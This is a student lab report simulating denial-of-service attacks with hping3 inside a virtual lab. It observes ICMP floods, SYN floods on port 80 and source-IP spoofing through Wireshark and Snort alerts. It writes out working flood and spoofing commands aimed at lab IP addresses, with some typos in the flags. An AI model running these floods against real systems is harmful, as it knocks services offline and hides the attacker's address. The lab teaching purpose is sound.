S Krupaa

01.03.2022 19BEC1385
Experiment – 6
DOS Attack Simulation using HPING3
Aim:
To perform DOS Attack Simulation using HPING3 in kali linux.
THEORY:
DDOS ATTACK and DDOS Attack using HPING 3
HPING 3: Packet traffic tool
DOS:
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network,
making it inaccessible to its intended users. DoS attacks accomplish this by flooding the
target with traffic, or sending it information that triggers a crash.
Ping flood attack relies on ICMP echo ping command which is normally used for testing
network connectivity. In this attack ping is used to flood large amounts of data packets to the
victim’s computer to try to overload the system. Simply block the IP Address from accessing
your network.
SOFTWARE REQUIRED:
Kali Linux
Ubuntu
Commands and outputs:
HPING3 Attack
1. sudo apt-get install hping3 – to install hping3 in kali linux.

2. Find the ip address of both virtual machines and open wireshark in kali
linux.
 3. ping <ip of ubuntu> [ping 192.168.29.111] – to ping the ubuntu.

We can see the Wireshark has captured 12 ICMP packet with 6 request and 6
reply packets.
4. Type cd /etc/snort/rules in ubuntu to change the directory.
Type sudo nano local.rules to configure the rules of the snort.

5. Now test and execute the snort using sudo snort -T -c

/etc/snort/snort.conf caomand and sudo snort -A console -c
/etc/snort/snort.conf.
6. hping3 -1 -c 10 <ip of ubuntu> [ hping3 -1 -c 10 192.168.29.111 ] – to
ping the ubuntu with only one ICMP packet.
We can see that the packet has been captured in wireshark and alert meassage
has been generated from ubuntu snort.
7. hping3 -1 -c 4 <ip of ubuntu> [ hping3 -1 -c 4 192.168.1.11 ] – to ping
the ubuntu with four ICMP packet.

We can see that the packet has been captured in wireshark and alert meassage
has been generated from ubuntu snort.
8. hping3 -1 -c 4 -d 120 <ip of ubuntu> [ hping3 -1 -c 4 -d 120
192.168.1.11 ] – to ping the ubuntu with four ICMP packet of each with a
size of 120 bytes.
We can see that at 2nd line a extra of 120 data bytes has been added.

The request has been captured in Wireshark.

9. hping3 -1 -c 4 -i 5 <ip of ubuntu> [ hping3 -1 -c 4 -I 5 192.168.1.11 ] –
to ping the ubuntu with four ICMP packet of each with an interval break
of 5 seconds.
The request has been captured in Wireshark.
10. hping3 -1 –fast <ip of ubuntu> [ hping3 -1 –fast 192.168.1.11 ] – to
ping the ubuntu with ICMP packet at faster rate (i.e.) 10 ping per second.

The request has been captured in Wireshark.

11. hping3 -1 –faster <ip of ubuntu> [ hping3 -1 –faster 192.168.1.11 ] –
to ping the ubuntu with ICMP packet at faster (i.e.) 100 ping per second.
Hping3 -S –faster <ip of ubuntu> [ hping3 -S –faster 192.168.1.11 ] –
to ping the ubuntu with TCP packet at faster (i.e.) 100 ping per second.
The request has been captured in Wireshark.
12. hping3 -1 –flood <ip of ubuntu> [ hping3 -1 –flood 192.168.1.11 ] – to
ping the ubuntu with ICMP packet at very faster rate.
The request has been captured in Wireshark.
13. hping3 -1 -c 1 -a <any ip address> <ip of ubuntu> [ hping3 -1 -c 1 -a
192.168.1.50 192.168.1.11 ] – to spoof and hide the sender ip address by
another address.

We can see that our ip address (192.168.1.10) has spoofed with ip address
(192.168.1.50)
14. hping3 -1 –rand-source -c 1 <ip of ubuntu> [ hping3 -1 –rand-source
-c 1 192.168.1.11 ] – to spoof and hide the sender ip address with any
random ip address.
We can see that our ip address (192.168.1.10) has spoofed with random ip
address.
15. hping3 -1 --rand-source –flood <ip of ubuntu> [ hping3 -1 --rand-
source –flood 192.168.1.11 ] – to spoof and hide the sender ip address
with any random ip address and flood the destination ip address.
 Syn Flood Attack
1. Find the ip address of metasploitable and open DVWA in ubuntu in
browser.
2. hping -S -c 1 -p 80 <ip of meta> [ hping -S -c 1 -p 80 192.168.1.13 ] –
to perform syn flood attack on metasploitable via port 80 by sending one
TCP packet.

3. hping -S --flood -p 80 <ip of meta> [ hping -S --flood -p 80

192.168.1.13 ] – to perform syn flood attack on metasploitable via port 80
by flooding the port with multiple requests.
4. hping -S --flood -p 80 --rand-source <ip of meta> [ hping -S --flood -p
80 –rand-source 192.168.1.13 ] – to perform syn flood attack on
metasploitable via port 80 by flooding the port with multiple requests
from random ip addresses.
We can see that DVWA is taking time to logging in.

Result:
Thus, performed DOS Attack Simulation using HPING3 in kali linux.